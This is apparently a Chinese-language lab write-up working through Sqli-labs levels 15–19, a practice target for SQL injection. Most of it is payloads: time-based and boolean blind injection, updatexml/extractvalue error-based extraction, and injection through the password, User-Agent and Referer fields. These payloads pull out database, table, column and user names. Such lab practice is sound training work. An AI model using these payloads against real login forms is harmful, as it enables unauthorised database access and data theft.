Sqli-labs靶场(Less15-19)

目录

Less-15

Less-16

Less-17

Less-18

Less-19

---

Less-15

随便输点什么...

 

抓包

admin' and1=1;

admin' and 1=2;#

盲注

 使用延迟注入

猜数据库名字的长度

uname=admin'and if(length(database())=8,sleep(10),1) --+&passwd=password&submit=Submit

猜数据库的第一个字母

and if(left(database(),1)='s',sleep(10),1)

...依次类推...10秒简直太漫长了...

猜表名

uname=admin'and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(6),1)

uname=admin'and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' ,sleep(6),1)--+&passwd=password&submit=Submit

...找到user表...

还是使用另一种方法吧...

uname=admin' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 %23

猜列名

uname=admin' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(6),1) --+

uname=admin' and left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8)="username" %23

爆字段

uname=admin' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 %23

 

Less-16

 

抓包

 错误，那改成"试试

还是错误

再试试加点东西，正确了！

但是

没有回显，那只能盲注喽...

基于布尔型的盲注和基于时间的盲注，选一个试试

猜数据库的长度

uname=admin") and (length(database())) = 8 %23 &passwd=password&submit=Submit

猜数据库名字

uname=admin") and (ascii(substr((select database()) ,1,1))) = 115 %23  &passwd=password&submit=Submit

uname=admin") and (ascii(substr((select database()) ,2,1))) = 101 %23 &passwd=password&submit=Submit

...依次进行...猜出数据库security

猜表的长度

uname=admin") and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 %23 &passwd=password&submit=Submit

uname=admin") and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 %23 &passwd=password&submit=Submit

...长度为5...会是users表吗？试试看

猜表的名字

uname=admin") and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 %23 &passwd=password&submit=Submit

或者使用left()

uname=admin") and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)="users" %23 &passwd=password&submit=Submit

找到users表了...

猜列的长度

uname=admin") and (length((select column_name from information_schema.columns where table_name="users" limit 4,1))) = 8 %23 &passwd=password&submit=Submit

猜列的名字

uname=admin") and left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8)="username" %23 &passwd=password&submit=Submit

爆字段啦

uname=admin") and (ascii(substr((select username from users limit 0,1),1,1))) = 68 %23 &passwd=password&submit=Submit

..一个一个来...

Less-17

 抓包

第一步，找闭合字符

 在uname注入发现怎么都不行...

那么

uname=admin&passwd=password' and 1=1;#&submit=Submit

成功了，原来注入点换地方了...

使用updatexml (XML_document, XPath_string, new_value);

tips：XPATH_string是报错的关键。concat()函数是将其连成一个字符串，因此不会符合XPATH_string的格式，从而出现格式错误，爆出！

0x7e为~，不属于xpath的语法格式；

uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select user()),0x7e),1) %23&submit=Submit

uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select datebase()),0x7e),1) %23&submit=Submit

 

uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) %23&submit=Submit

发现并不全...怎么办呢...

一个一个的爆吧

爆数据库

uname=admin&passwd=password'and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1) %23 &submit=Submit

uname=admin&passwd=password'and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e),1) %23 &submit=Submit

爆security数据库中的表名

uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 3,1),0x7e),1) %23 &submit=Submit

注意：如果没有where后面的语句那么将是所有的表名

爆列名

爆字段名

...等等等...

Less-18

 

 页面有不一样的东西了

抓包

发现在uname与passwd里都不能找到使其能够闭合的字符

查看一下源代码

发现insert语句，将uagent，ip_address,username插入数据库

发现登录成功后，会输出IP与Agent

那我们试试

换个注入点

 

爆数据库名

'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '

也可以使用extractvalue()

'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

爆表名

爆列名

爆字段

........

其实，也可一开始就登陆成功

看回显

可以猜测注入点是在user-agent

Less-19

这次我打算之间登录看看

有回显

可以猜测一下这次注入点应该在referer

 嗯嗯，没错~

查看源代码

 

---